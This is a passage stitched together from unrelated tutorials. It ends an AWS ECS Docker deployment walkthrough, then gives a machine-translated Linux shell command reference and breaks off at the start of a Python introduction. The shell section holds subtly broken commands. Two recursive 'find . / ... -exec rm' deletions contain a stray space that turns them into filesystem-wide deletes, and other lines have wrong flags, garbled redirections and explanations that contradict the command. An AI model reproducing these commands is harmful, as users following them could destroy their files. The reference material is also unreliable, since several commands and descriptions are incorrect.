Wohoo! We get a valid response! Try playing around by making more changes in the app.
That concludes our tour of Docker Compose. With Docker Compose, you can also pause your services, run a one-off command on a container and even scale the number of containers. I also recommend you checkout a few other use-cases of Docker compose. Hopefully, I was able to show you how easy it is to manage multi-container environments with Compose. In the final section, we are going to deploy our app to AWS!
AWS Elastic Container Service
In the last section we used docker-compose
to run our app locally with a single command: docker-compose up
. Now that we have a functioning app we want to share this with the world, get some users, make tons of money and buy a big house in Miami. Executing the last three are beyond the scope of the tutorial, so we'll spend our time instead on figuring out how we can deploy our multi-container apps on the cloud with AWS.
If you've read this far you are pretty much convinced that Docker is a pretty cool technology. And you are not alone. Seeing the meteoric rise of Docker, almost all Cloud vendors started working on adding support for deploying Docker apps on their platform. As of today, you can deploy containers on Google Cloud Platform, AWS, Azure and many others. We already got a primer on deploying single container apps with Elastic Beanstalk and in this section we are going to look at Elastic Container Service (or ECS) by AWS.
AWS ECS is a scalable and super flexible container management service that supports Docker containers. It allows you to operate a Docker cluster on top of EC2 instances via an easy-to-use API. Where Beanstalk came with reasonable defaults, ECS allows you to completely tune your environment as per your needs. This makes ECS, in my opinion, quite complex to get started with.
Luckily for us, ECS has a friendly CLI tool that understands Docker Compose files and automatically provisions the cluster on ECS! Since we already have a functioning docker-compose.yml
it should not take a lot of effort in getting up and running on AWS. So let's get started!
The first step is to install the CLI. Instructions to install the CLI on both Mac and Linux are explained very clearly in the official docs. Go ahead, install the CLI and when you are done, verify the install by running
$ ecs-cli --version
ecs-cli version 1.18.1 (7e9df84)
Next, we'll be working on configuring the CLI so that we can talk to ECS. We'll be following the steps as detailed in the official guide on AWS ECS docs. In case of any confusion, please feel free to refer to that guide.
The first step will involve creating a profile that we'll use for the rest of the tutorial. To continue, you'll need your AWS_ACCESS_KEY_ID
and AWS_SECRET_ACCESS_KEY
. To obtain these, follow the steps as detailed under the section titled Access Key and Secret Access Key on this page.
$ ecs-cli configure profile --profile-name ecs-foodtrucks --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY
Next, we need to get a keypair which we'll be using to log into the instances. Head over to your EC2 Console and create a new keypair. Download the keypair and store it in a safe location. Another thing to note before you move away from this screen is the region name. In my case, I have named my key - ecs
and set my region as us-east-1
. This is what I'll assume for the rest of this walkthrough.
The next step is to configure the CLI.
$ ecs-cli configure --region us-east-1 --cluster foodtrucks
INFO[0000] Saved ECS CLI configuration for cluster (foodtrucks)
We provide the configure
command with the region name we want our cluster to reside in and a cluster name. Make sure you provide the same region name that you used when creating the keypair. If you've not configured the AWS CLI on your computer before, you can use the official guide, which explains everything in great detail on how to get everything going.
The next step enables the CLI to create a CloudFormation template.
$ ecs-cli up --keypair ecs --capability-iam --size 1 --instance-type t2.medium
INFO[0000] Using recommended Amazon Linux 2 AMI with ECS Agent 1.39.0 and Docker version 18.09.9-ce
INFO[0000] Created cluster cluster=foodtrucks
INFO[0001] Waiting for your cluster resources to be created
INFO[0001] Cloudformation stack status stackStatus=CREATE_IN_PROGRESS
INFO[0062] Cloudformation stack status stackStatus=CREATE_IN_PROGRESS
INFO[0122] Cloudformation stack status stackStatus=CREATE_IN_PROGRESS
INFO[0182] Cloudformation stack status stackStatus=CREATE_IN_PROGRESS
INFO[0242] Cloudformation stack status stackStatus=CREATE_IN_PROGRESS
VPC created: vpc-0bbed8536930053a6
Security Group created: sg-0cf767fb4d01a3f99
Subnet created: subnet-05de1db2cb1a50ab8
Subnet created: subnet-01e1e8bc95d49d0fd
Cluster creation succeeded.
Here we provide the name of the keypair we downloaded initially (ecs
in my case), the number of instances that we want to use (--size
) and the type of instances that we want the containers to run on. The --capability-iam
flag tells the CLI that we acknowledge that this command may create IAM resources.
The last and final step is where we'll use our docker-compose.yml
file. We'll need to make a few minor changes, so instead of modifying the original, let's make a copy of it. The contents of this file (after making the changes) look like (below) -
version: '2'
services:
es:
image: docker.elastic.co/elasticsearch/elasticsearch:7.6.2
cpu_shares: 100
mem_limit: 3621440000
environment:
- discovery.type=single-node
- bootstrap.memory_lock=true
- "ES_JAVA_OPTS=-Xms512m -Xmx512m"
logging:
driver: awslogs
options:
awslogs-group: foodtrucks
awslogs-region: us-east-1
awslogs-stream-prefix: es
web:
image: yourusername/foodtrucks-web
cpu_shares: 100
mem_limit: 262144000
ports:
- "80:5000"
links:
- es
logging:
driver: awslogs
options:
awslogs-group: foodtrucks
awslogs-region: us-east-1
awslogs-stream-prefix: web
The only changes we made from the original docker-compose.yml
are of providing the mem_limit
(in bytes) and cpu_shares
values for each container and adding some logging configuration. This allows us to view logs generated by our containers in AWS CloudWatch. Head over to CloudWatch to create a log group called foodtrucks
. Note that since ElasticSearch typically ends up taking more memory, we've given around 3.4 GB of memory limit. Another thing we need to do before we move onto the next step is to publish our image on Docker Hub.
$ docker push yourusername/foodtrucks-web
Great! Now let's run the final command that will deploy our app on ECS!
$ cd aws-ecs
$ ecs-cli compose up
INFO[0000] Using ECS task definition TaskDefinition=ecscompose-foodtrucks:2
INFO[0000] Starting container... container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es
INFO[0000] Starting container... container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web
INFO[0000] Describe ECS container status container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0000] Describe ECS container status container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0036] Describe ECS container status container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0048] Describe ECS container status container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0048] Describe ECS container status container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0060] Started container... container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=RUNNING taskDefinition=ecscompose-foodtrucks:2
INFO[0060] Started container... container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=RUNNING taskDefinition=ecscompose-foodtrucks:2
It's not a coincidence that the invocation above looks similar to the one we used with Docker Compose. If everything went well, you should see a desiredStatus=RUNNING lastStatus=RUNNING
as the last line.
Awesome! Our app is live, but how can we access it?
ecs-cli ps
Name State Ports TaskDefinition
845e2368-170d-44a7-bf9f-84c7fcd9ae29/web RUNNING 54.86.14.14:80->5000/tcp ecscompose-foodtrucks:2
845e2368-170d-44a7-bf9f-84c7fcd9ae29/es RUNNING ecscompose-foodtrucks:2
Go ahead and open http://54.86.14.14 in your browser and you should see the Food Trucks in all its black-yellow glory! Since we're on the topic, let's see how our AWS ECS console looks.
We can see above that our ECS cluster called 'foodtrucks' was created and is now running 1 task with 2 container instances. Spend some time browsing this console to get a hang of all the options that are here.
Cleanup
Once you've played around with the deployed app, remember to turn down the cluster -
$ ecs-cli down --force
INFO[0001] Waiting for your cluster resources to be deleted...
INFO[0001] Cloudformation stack status stackStatus=DELETE_IN_PROGRESS
INFO[0062] Cloudformation stack status stackStatus=DELETE_IN_PROGRESS
INFO[0124] Cloudformation stack status stackStatus=DELETE_IN_PROGRESS
INFO[0155] Deleted cluster cluster=foodtrucks
So there you have it. With just a few commands we were able to deploy our awesome app on the AWS cloud!
CONCLUSION
And that's a wrap! After a long, exhaustive but fun tutorial you are now ready to take the container world by storm! If you followed along till the very end then you should definitely be proud of yourself. You learned how to setup Docker, run your own containers, play with static and dynamic websites and most importantly got hands on experience with deploying your applications to the cloud!
I hope that finishing this tutorial makes you more confident in your abilities to deal with servers. When you have an idea of building your next app, you can be sure that you'll be able to get it in front of people with minimal effort.
Next Steps
Your journey into the container world has just started! My goal with this tutorial was to whet your appetite and show you the power of Docker. In the sea of new technology, it can be hard to navigate the waters alone and tutorials such as this one can provide a helping hand. This is the Docker tutorial I wish I had when I was starting out. Hopefully, it served its purpose of getting you excited about containers so that you no longer have to watch the action from the sides.
Below are a few additional resources that will be beneficial. For your next project, I strongly encourage you to use Docker. Keep in mind - practice makes perfect!
Additional Resources
Off you go, young padawan!
Give Feedback
Now that the tutorial is over, it's my turn to ask questions. How did you like the tutorial? Did you find the tutorial to be a complete mess or did you have fun and learn something?
Send in your thoughts directly to me or just create an issue. I'm on Twitter, too, so if that's your deal, feel free to holler there!
I would totally love to hear about your experience with this tutorial. Give suggestions on how to make this better or let me know about my mistakes. I want this tutorial to be one of the best introductory tutorials on the web and I can't do it without your help.
Linux OS Installation and Basics
https://linuxtools-rst.readthedocs.io/zh_CN/latest/base/index.html
https://www.tutorialspoint.com/unix/index.htm
https://www.digitalocean.com/community/tutorials/an-introduction-to-linux-basics
What is Unix ?
The Unix operating system is a set of programs that act as a link between the computer and the user.
The computer programs that allocate the system resources and coordinate all the details of the computer's internals are called the operating system or the kernel.
Users communicate with the kernel through a program known as the shell. The shell is a command line interpreter; it translates commands entered by the user and converts them into a language that is understood by the kernel.
- Unix was originally developed in 1969 by a group of AT&T employees Ken Thompson, Dennis Ritchie, Douglas McIlroy, and Joe Ossanna at Bell Labs.
- There are various Unix variants available in the market. Solaris Unix, AIX, HP Unix, and BSD are a few examples. Linux is also a freely available flavor of Unix.
- Several people can use a Unix computer at the same time; hence Unix is called a multiuser system.
- A user can also run multiple programs at the same time; hence Unix is a multitasking environment.
Prerequisites
To follow along with this guide, you will need access to a computer running a Linux-based operating system. This can either be a virtual private server that you’ve connected to with SSH or your local machine. Note that this tutorial was validated using a Linux server running Ubuntu 20.04, but the examples given should work on a computer running any version of any Linux distribution.
If you plan to use a remote server to follow this guide, we encourage you to first complete our Initial Server Setup guide. Doing so will set you up with a secure server environment — including a non-root user with sudo
privileges and a firewall configured with UFW — which you can use to build your Linux skills.
The Terminal
The terms “terminal,” “shell,” and “command line interface” are often used interchangeably, but there are subtle differences between them:
- A terminal is an input and output environment that presents a text-only window running a shell.
- A shell is a program that exposes the computer’s operating system to a user or program. In Linux systems, the shell presented in a terminal is a command line interpreter.
- A command line interface is a user interface (managed by a command line interpreter program) that processes commands to a computer program and outputs the results.
When someone refers to one of these three terms in the context of Linux, they generally mean a terminal environment where you can run commands and see the results printed out to the terminal, such as this:
Becoming a Linux expert requires you to be comfortable with using a terminal. Any administrative task, including file manipulation, package installation, and user management, can be accomplished through the terminal. The terminal is interactive: you specify commands to run and the terminal outputs the results of those commands. To execute any command, you type it into the prompt and press ENTER
.
When accessing a cloud server, you’ll most often be doing so through a terminal shell. Although personal computers that run Linux often come with the kind of graphical desktop environment familiar to most computer users, it is often more efficient or practical to perform certain tasks through commands entered into the terminal.
Learn to use command help
Overview
In the linux terminal, when we don't know how to use a command, or don't remember the spelling of a command or its parameters, we need to turn to the system's help documentation; the built-in help documentation in linux is very detailed and usually solves our problems, so we need to know how to use it properly.
- in cases where we only remember some of the command keywords, we can search for them by using man -k.
- needing a brief description of a command, we can use what is; for a more detailed description, we can use the info command.
- to see where the command is located, we need to use which.
- and for the specific parameters of a command and how to use it, we need to use the powerful man.
These commands are described below.
Command usage
View a brief description of the command
A brief description of what the command does (showing the man category page where the command is located):
$whatis command
Regular match:
$whatis -w "loca*"
More detailed documentation:
$info command
Using man
Query the documentation for the command command:
$man command
eg: man date
Using page up and page down to page up and down
In the man help manual, the help documentation is divided into 9 categories, for some keywords that may exist in more than one category, we need to specify a specific category to view; (generally, we query the bash command, categorized in category 1).
man page belongs to the category identification (commonly used is category 1 and category 3)
(1), the user can operate the command or executable file
(2), the core of the system can be called functions and tools, etc.
(3), some common functions and databases
(4), the description of the device file
(5), the format of the settings file or some files
(6), games
(7), conventions and protocols, etc. For example, the Linux standard file system, network protocols, ASCII, code and other descriptions of the content
(8), the system administrator available to manage the order
(9), and kernel-related files
As mentioned earlier using whatis will show the specific document category where the command is located, we learn how to use it
eg:
$whatis printf
printf (1) - format and print data
printf (1p) - write formatted output
printf (3) - formatted output conversion
printf (3p) - print formatted output
printf [builtins] (1) - bash built-in commands, see bash(1)
We see that printf is available in both category 1 and category 3; the pages in category 1 are for help on command operations and executables; while 3 is for instructions on commonly used libraries; if we want to see the use of printf in C, we can specify to see the help in category 3:
$man 3 printf
$man -k keyword
query keyword Query commands based on some of the keywords in the command, for occasions when only part of the command is remembered.
eg: Find GNOME's config tool command:
$man -k GNOME config| grep 1
For a word search, you can use /word directly to use: /-a; pay more attention to SEE ALSO to see more exciting content
Checking paths
Check the path to the program's binary file:
$which command
eg: Find the path where the make program is installed:
$which make
/opt/app/openav/soft/bin/make install
Check the search path of the program:
$whereis command
This command comes in handy when there are multiple versions of the same software installed on the system and you are not sure which version is being used.
File and directory management
Directory
- File and directory management
- Create and delete
- Directory switching
- List directory entries
- Find directories and files find/locate
- View file contents
- Find the contents of a file
- Modify file and directory permissions
- Adding aliases to files
- Piping and Redirection
- Set environment variables
- Bash shortcut input or delete
- General Application
File management is nothing more than creating, deleting, querying, and moving files or directories, with mkdir/rm/mv
file query as the focus, with found for query; find is parameter rich and very powerful.
viewing file content is a big topic, and there are too many tools for us to use for text processing, which are just pointed out in this chapter, and a special chapter will be devoted to text processing tools later.
Sometimes it is necessary to create an alias for a file, and we need to use ln, using this alias has the same effect as using the original file.
Create and delete
- Create: mkdir
- Delete: rm
- Delete non-empty directories: rm -rf file directory
- Delete log rm *log (Equivalent: $find . / -name "*log" -exec rm {} ;)
- Move: mv
- Copy: cp (Copy directory: cp -r )
View the number of files in the current directory:
$find . / | wc -l
Copy the directory:
$cp -r source_dir dest_dir
Directory switching
- Find the file/directory location: cd
- Switch to the previous working directory: cd -
- Switch to the home directory: cd or cd ~
- Show current path: pwd
- Change the current working path to path: $cd path
List directory entries
- Display the files in the current directory ls
- Show directory entries as a list, sorted by time ls -lrt
The above command is used so often that we need to create a shortcut for it:
Set the command alias in .bashrc:
alias lsl='ls -lrt'
alias lm='ls -al|more'
so that, using lsl, the files in the directory can be displayed sorted by modification time; in a list.
- Add an id number to the front of each file (for a neater look):
> ls | cat -n
> 1 a 2 a.out 3 app 4 b 5 bin 6 config
Note: .bashrc is stored as a hidden file under the /home/your username/ folder; you can check it with ls -a.
Find directories and files find/locate
Search for a file or directory:
$find . / -name "core*" | xargs file
Find if there is an obj file in the target folder:
$find . / -name '*.o'
Recursively delete all .o files in the current directory and subdirectories:
$find . / -name "*.o" -exec rm {} \;
find is a real-time lookup, if you need a faster query, try locate; locate will create an index database for the file system, if there are file updates, you need to execute the update command periodically to update the index database:
$locate string
Find paths that contain string:
$updatedb
Unlike find, locate is not a real-time lookup. You need to update the database to get the latest file index information.
View file contents
To view the file: cat vi head tail more
Display the file with the line number:
$cat -n
Show list contents by page:
$ls -al | more
See only the first 10 lines:
$head - 10 **
Show the first line of the file:
$head -1 filename
Show the penultimate line of the file:
$tail -5 filename
See the difference between the two files:
$diff file1 file2
Dynamically display the latest information in the text:
$tail -f crawler.log
Find the contents of a file
Use egrep to query the contents of a file:
egrep '03.1\/CO\/AE' TSF_STAT_111130.log.012
egrep 'A_LMCA777:C' TSF_STAT_111130.log.035 > co.out2
File and directory permission modification
- Change the owner of a file chown
- Change file read, write, execute, etc. attributes chmod
- Recursive subdirectory modification: chown -R tuxapp source/
- Add script executable permissions: chmod a+x myscript
Add aliases to files
Create symbolic/hard links:
ln cc ccAgain :hard link; delete one, will still be found.
ln -s cc ccTo :symbolic link (soft link); delete the source, the other will not be available; (the latter ccTo is a newly created file)
Pipelines and Redirects
- Batch command concatenation execution, using |
- Concatenation: use semicolon ;
- If the previous one succeeds, the next one is executed, otherwise, it is not executed :&&
- If the first one fails, the next one is executed: ||
ls /proc && echo suss! || echo failed.
The ability to indicate whether the named execution succeeded OR failed.
The same effect as above is :
if ls /proc; then echo suss; else echo failed; fi
Redirect:
ls proc/*.c > list 2> &l Redirects standard output and standard errors to the same file.
The equivalent is :
ls proc/*.c &> list
Clear the file:
:> a.txt
Redirect:
echo aa >> a.txt
Setting environment variables
automatically executed after starting the account is the file .profile, through which you can then set your own environment variables.
The path of the installed software usually needs to be added to the path:
PATH=$APPDIR:/opt/app/soft/bin:$PATH:/usr/local/bin:$TUXDIR/bin:$ORACLE_HOME/bin;export PATH
Bash shortcut input or delete
Shortcut keys:
Ctl-U deletes all characters from the cursor to the beginning of the line, and in some settings, the entire line
Ctl-W deletes the characters between the current cursor and the nearest preceding space
Ctl-H backspace, delete the character in front of the cursor
Ctl-R match the closest file and output
Integrated Applications
Find the total number of records in record.log that contain AAA, but not BBB:
cat -v record.log | grep AAA | grep -v BBB | wc -l
Text processing
Directory
- Text processing
- find File Find
- Customized search
- Follow-up actions after finding
- Delimiters for -print
- grep text search
- xargs command line argument conversion
- sort sorting
- uniq Eliminate duplicate rows
- Convert with tr
- cut slice text by column
- paste Splice text by column
- wc Tools for counting rows and characters
- sed text replacement tool
- awk data stream processing tool
- print prints the current line
- Special variables: NR NF $0 $1 $2
- Passing external variables
- Filtering lines processed by awk with styles
- Setting delimiters
- Reading command output
- Using loops in awk
- awk combined with grep to find the specified service and kill it
- awk implements the head and tail commands
- Print specified columns
- Print a specified text area
- Common built-in functions in awk
- Iterate over lines, words and characters in a file
-
- iterate over each line in the file
-
- iterate over each word in a line
-
- iterate over each character
-
- find File Find
This section will introduce the most commonly used tools for working with text in the shell under Linux: find, grep, xargs, sort, uniq, tr, cut, paste, wc, sed, awk; the examples and arguments provided are all commonly used; my rule for shell scripts is to write a single line of command, try not to exceed 2 lines; if there are more more complex tasks, consider python.
Find file search
find txt and pdf files:
find . \( -name "*.txt" -o -name "*.pdf" \) -print
regular way to find .txt and pdf:
find . -regex ". *\(\.txt|\.pdf\)$"
-iregex: ignore case-sensitive regularity
Negate arguments , find all non-txt text:
find . ! -name "*.txt" -print
Specify the search depth, print out the files in the current directory (depth 1):
find . -maxdepth 1 -type f
Custom search
- Search by type
find . -type d -print // list all directories only
-type f files / l symbolic links / d directories
the file search types supported by find can distinguish between ordinary files and symbolic links, directories, etc., but binary and text files cannot be distinguished directly by the types of find
The file command can check the specific type of file (binary or text):
$file redis-cli # binary file
redis-cli: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
$file redis.pid # Text file
redis.pid: ASCII text
redis.pid: ASCII text
So, you can use the following combination of commands to find all the binary files in your local directory:
ls -lrt | awk '{print $9}'|xargs file|grep ELF| awk '{print $1}'|tr -d ':'
-
Search by time
-atime access time (in days, or -amin in minutes, similar below) -mtime modification time (content was modified) -ctime change time (metadata or permission changes)
All files that have been accessed in the last 7 days:
find . -atime 7 -type f -print
All files that have been accessed in the last 7 days:
find . -atime -7 -type f -print
Search for all files accessed 7 days ago:
find . -atime +7 type f -print
- Search by size.
w word k M G Find files larger than 2k:
find . -type f -size +2k
Find by permissions:
find . -type f -perm 644 -print //find all files with executable permissions
Find by user:
find . -type f -user weber -print// Find files owned by user weber
Follow-up actions after finding
- Delete
Delete all swp files in the current directory:
find . -type f -name "*.swp" -delete
Another syntax:
find . type f -name "*.swp" | xargs rm
- Execute action (powerful exec)
Change the ownership of the current directory to weber:
find . -type f -user root -exec chown weber {} \;
Note: {} is a special string, and for each matching file, {} is replaced with the corresponding filename.
Copy all the files found to another directory:
find . -type f -mtime +10 -name "*.txt" -exec cp {} OLD \;
- Combining multiple commands
If you need to execute multiple commands subsequently, you can write multiple commands as one script. Then just execute the script when -exec is called:
-exec . /commands.sh {} \;
-print's delimiter
Use '\n' as the delimiter for the file by default.
-print0 uses '\0' as the file delimiter so that it can search for files containing spaces.
Grep text search
grep match_patten file // default access to matching lines
Common parameters
-o only output matching text lines VS -v only output text lines that do not match
-c counts the number of times the file contains text
grep -c "text" filename
-n Print matching line numbers
-i Ignore case when searching
-l prints only the file name
Recursive search for text in multi-level directories (a favorite of programmers searching for code):
grep "class" . -R -n
Match multiple patterns:
grep -e "class" -e "vitural" file
grep output file names with a 0 as the ending character (-z):
grep "test" file* -lZ| xargs -0 rm
Comprehensive application: find all sql lookups with where conditions in the log:
cat LOG.* | tr a-z A-Z | grep "FROM " | grep "WHERE" > b
find Chinese example: project directory in utf-8 format and gb2312 format two kinds of files, to find the word is Chinese.
-
find out its utf-8 encoding and gb2312 encoding are E4B8ADE69687 and D6D0CEC4 respectively
-
query :
grep: grep -rnP "\xE4\xB8\xAD\xE6\x96\x87|\xD6\xD0\xCE\xC4" * can be
Chinese character code lookup: http://bm.kdd.cc/
Xargs Command Line Parameter Conversion
xargs is able to convert input data into command line arguments for a specific command; in this way, it can be used in combination with many commands. e.g. grep, e.g. find; - Converting multi-line output to single-line output
cat file.txt| xargs
n is a delimiter between multiple lines of text
- Convert single line to multi-line output
cat single.txt | xargs -n 3
-n: specifies the number of fields to display per line
Description of xargs parameters
-d defines the delimiter (the default is a space. The delimiter for multiple lines is n) -n specifies that the output is multi-line -I {} specifies the replacement string that will be replaced when xargs is expanded, used when the command to be executed requires multiple arguments -0: specify 0 as input delimiter
Example:
cat file.txt | xargs -I {} . /command.sh -p {} -1
# Count the number of lines in the program
find source_dir/ -type f -name "*.cpp" -print0 |xargs -0 wc -l
#redis stores data by string and indexes by set, and needs to look up all values by index.
. /redis-cli smembers $1 | awk '{print $1}'|xargs -I {} . /redis-cli get {}
Sort
Field Description
-n Sort by number VS -d Sort by dictionary order -r Sort in reverse order -k N specifies sorting by column N
Example:
sort -nrk 1 data.txt
sort -bd data // ignore leading whitespace characters like spaces
Uniq Eliminate duplicate rows
- Eliminate duplicate rows
sort unsort.txt | uniq
- Count the number of times each row appears in the file
sort unsort.txt | uniq -c
- Find duplicate rows
sort unsort.txt | uniq -d
You can specify the duplicates to be compared in each line: -s start position -w number of characters to compare
Converting with tr
- General usage
echo 12345 | tr '0-9' '9876543210' // encryption and decryption conversion, replacing the corresponding characters
cat text| tr '\t' ' ' //tab to space conversion
- tr delete characters
cat file | tr -d '0-9' // delete all numbers
-c find the complement
cat file | tr -c '0-9' // Get all the numbers in the file
cat file | tr -d -c '0-9 \n' // delete non-numeric data
- tr compress characters
tr -s compresses repetitive characters in text; most often used to compress extra spaces:
cat file | tr -s ' '
-
Character classes
-
Various character classes are available in tr.
alnum: letters and numbers alpha: letters digit: numbers space: blank characters lower: lowercase upper: uppercase cntrl: control (non-printable) characters print: printable characters
Usage: tr [:class:] [:class:]
tr '[:lower:]' '[:upper:]'
Cut cut text by column
- Truncate the second and fourth columns of the file
cut -f2,4 filename
- Remove all columns from the file except column 3
cut -f3 --complement filename
-d Specify delimiters
cat -f2 -d";" filename
-cut The range to take
N - Nth field to the end -M 1st field for MN-M N to M fields
-
The unit to be fetched by cut
-b in bytes -c in characters -f in fields (using delimiters)
Example:
cut -c1-5 file // print first to 5 characters
cut -c-2 file //Print the first 2 characters
Truncate columns 5 to 7 of the text
$echo string | cut -c5-7
Paste Splice text by column
Splices two pieces of text together by column;
cat file1
1
2
cat file2
colin
book
paste file1 file2
1 colin
2 book
The default delimiter is tab, you can use -d to specify the delimiter:
paste file1 file2 -d ","
1,colin
2,book
Wc Tools for counting lines and characters
$wc -l file // count the number of lines
$wc -w file // count the number of words
$wc -c file // count the number of characters
Sed text replacement tool
- First substitution
sed 's/text/replace_text/' file // Replace the first matching text on each line
- Global replacement
sed 's/text/replace_text/g' file
Default replace, output the replaced content, if you need to replace the original file directly, use -i:
sed -i 's/text/repalce_text/g' file
- Remove blank lines
sed '/^$/d' file
- Variable conversion
Matched strings are referenced by the & marker.
echo this is en example | sed 's/\w+/[&]/g'
$>[this] [is] [en] [example]
- Substring matching tokens
The contents of the first matching bracket are referenced using token 1
sed 's/hello\([0-9]\)/\1/'
- Double quotes for values
sed is usually quoted in single quotes; double quotes can also be used, and when used, double quotes will evaluate the expression:
sed 's/$var/HLLOE/'
when using double quotes, we can specify variables in sed style and in replacement strings.
eg:
p=patten
r=replaced
echo "line con a patten" | sed "s/$p/$r/g"
$>line con a replaced
- Other examples
String insertion character: converts each line of text (ABCDEF) to ABC/DEF:
sed 's/^. \{3\}/&\/g' file
Awk data stream processing tool
- The awk script structure
awk ' BEGIN{ statements } statements2 END{ statements } '
- How it works
-
executing the block of statements in begin.
-
reads a line from the file or stdin and executes statements2, repeating the process until the file has been read in its entirety.
-
Execute the end statement block.
print prints the current line
- When using print without arguments, the current line is printed
echo -e "line1\nline2" | awk 'BEGIN{print "start"} {print } END{ print "End" }'
- print When split by commas, arguments are delimited by spaces;
echo | awk ' {var1 = "v1" ; var2 = "V2"; var3 = "v3"; \
print var1, var2 , var3; }'
$>v1 V2 v3
- Using the -splicer approach ("" as a splice character) ;
echo | awk ' {var1 = "v1" ; var2 = "V2"; var3 = "v3"; \
print var1"-"var2"-"var3; }'
$>v1-V2-v3
Special variables: NR NF $0 $1 $2
NR:indicates the number of records, corresponding to the line number that should precede it during execution.
NF:indicates the number of fields, which always pairs up with the number of fields that should go forward during execution.
$0:this variable contains the text content of the current line during execution.
$1:the text content of the first field.
$2:the text content of the second field.
echo -e "line1 f2 f3 \n line2 \n line 3" | awk '{print NR":"$0"-"$1"-"$2}'
- Print the second and third fields of each line
awk '{print $2, $3}' file
- Count the number of lines in the file
awk ' END {print NR}' file
- Accumulate the first field of each line
echo -e "1\n 2\n 3\n 4\n" | awk 'BEGIN{num = 0 ;
print "begin";} {sum += $1;} END {print "=="; print sum }'
Passing external variables
var=1000
echo | awk '{print vara}' vara=$var # Input from stdin
awk '{print vara}' vara=$var file # Input from file
Filter the lines processed by awk with the style
awk 'NR < 5' # line number less than 5
awk 'NR == 1,NR == 4 {print}' file # Print out line numbers equal to 1 and 4
awk '/linux/' # lines containing linux text (can be specified with regular expressions, super powerful)
awk '! /linux/' # lines that do not contain linux text
Set delimiters
Use -F to set delimiters (default is spaces):
awk -F: '{print $NF}' /etc/passwd
Read command output
Use getline to read the output of an external shell command into the variable cmdout:
echo | awk '{"grep root /etc/passwd" | getline cmdout; print cmdout }'
Using loops in awk
for(i=0;i<10;i++){print $i;}
for(i in array){print array[i];}
eg:The following string, print out the time string:
2015_04_02 20:20:08: mysqli connect failed, please check connect info
$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F ":" '{ for(i=1;i<=;i++) printf("%s:",$i)}'
>2015_04_02 20:20:08: # This way will print the last colon
$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F':' '{print $1 ":" $2 ":" $3; }'
>2015_04_02 20:20:08 # This way satisfies the requirement
And if you need to print out the later part as well (the time part is printed separately from the later text) :
$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F':' '{print $1 ":" $2 ":" $3; print $4;}'
>2015_04_02 20:20:08
>mysqli connect failed, please check connect info
Print the rows in reverse order: (implementation of the tac command):
seq 9| \
awk '{lifo[NR] = $0; lno=NR} \
END{ for(;lno>-1;lno--){print lifo[lno];}
} '
awk combined with grep finds the specified service and kills it
ps -fe| grep msv8 | grep -v MFORWARD | awk '{print $2}' | xargs kill -9;
awk implementation of head and tail commands
- head
awk 'NR<=10{print}' filename
- tail
awk '{buffer[NR%10] = $0;} END{for(i=0;i<11;i++){ \
print buffer[i %10]} } ' filename
Print the specified column
- awk way to implement
ls -lrt | awk '{print $6}'
- The cut method
ls -lrt | cut -f6
Print the specified text area
- Determine the line number
seq 100| awk 'NR==4,NR==6{print}'
- Determine the text
Print the text between start_pattern and end_pattern:
awk '/start_pattern/, /end_pattern/' filename
Example:
seq 100 | awk '/13/,/15/'
cat /etc/passwd| awk '/mai.*mail/,/news.*news/'
awk common built-in functions
index(string,search_string):return the position of search_string in string
sub(regex,replacement_str,string):replace the first regular match with replacement_str;
match(regex,string):check if the regular expression can match the string.
length(string):return the length of the string
echo | awk '{"grep root /etc/passwd" | getline cmdout; print length(cmdout) }'
printf is similar to printf in c, and formats the output:
seq 10 | awk '{printf "->%4s\n", $1}'
Iterate over lines, words and characters in a file
Iterate over each line in the file
- while loop method
while read line;
do
echo $line;
done < file.txt
Change to a subshell:
cat file.txt | (while read line;do echo $line;done)
- awk method
cat file.txt| awk '{print}'
Iterate over each word in a line
for word in $line;
do
echo $word;
done
Iterate over each character
${string:start_pos:num_of_chars}: extract a character from the string; (bash text slicing)
${#word}:return the length of the variable word
for((i=0;i<${#word};i++))
do
echo ${word:i:1);
done
Display the file in ASCII characters:
$od -c filename
Python Programming Quick Guide - Installation and Basic IO
https://www.liaoxuefeng.com/wiki/1016959663602400
https://www.w3schools.com/python/python_intro.asp
https://docs.python.org/3/
What is Python?
Python is a popular programming language. It was created by Guido van Rossum, and released in 1991.
It is used for:
- web development (server-side),
- software development,
- mathematics,
- system scripting.
What can Python do?
- Python can be used on a server to create web applications.
- Python can be used alongside software to create workflows.
- Python can connect to database systems. It can also read and modify files.
- Python can be used to handle big data and perform complex mathematics.
- Python can be used for rapid prototyping, or for production-ready software development.
Why Python?
- Python works on different platforms (Windows, Mac, Linux, Raspberry Pi, etc).
- Python has a simple syntax similar to the English language.
- Python has a syntax that allows developers to write programs with fewer lines than some other programming languages.
- Python runs on an interpreter system, meaning that code can be executed as soon as it is written. This means that prototyping can be very quick.
- Python can be treated in a procedural way, an object-oriented way, or a functional way.
Good to know
- The most recent major version of Python is Python 3, which we shall be using in this tutorial. However, Python 2, although not being updated with anything other than security updates, is still quite popular.
- In this tutorial, Python will be written in a text editor. It is possible to write Python in an Integrated Development Environment, such as Thonny, Pycharm, Netbeans, or Eclipse which are particularly useful when managing larger collections of Python files.
Python Syntax compared to other programming languages
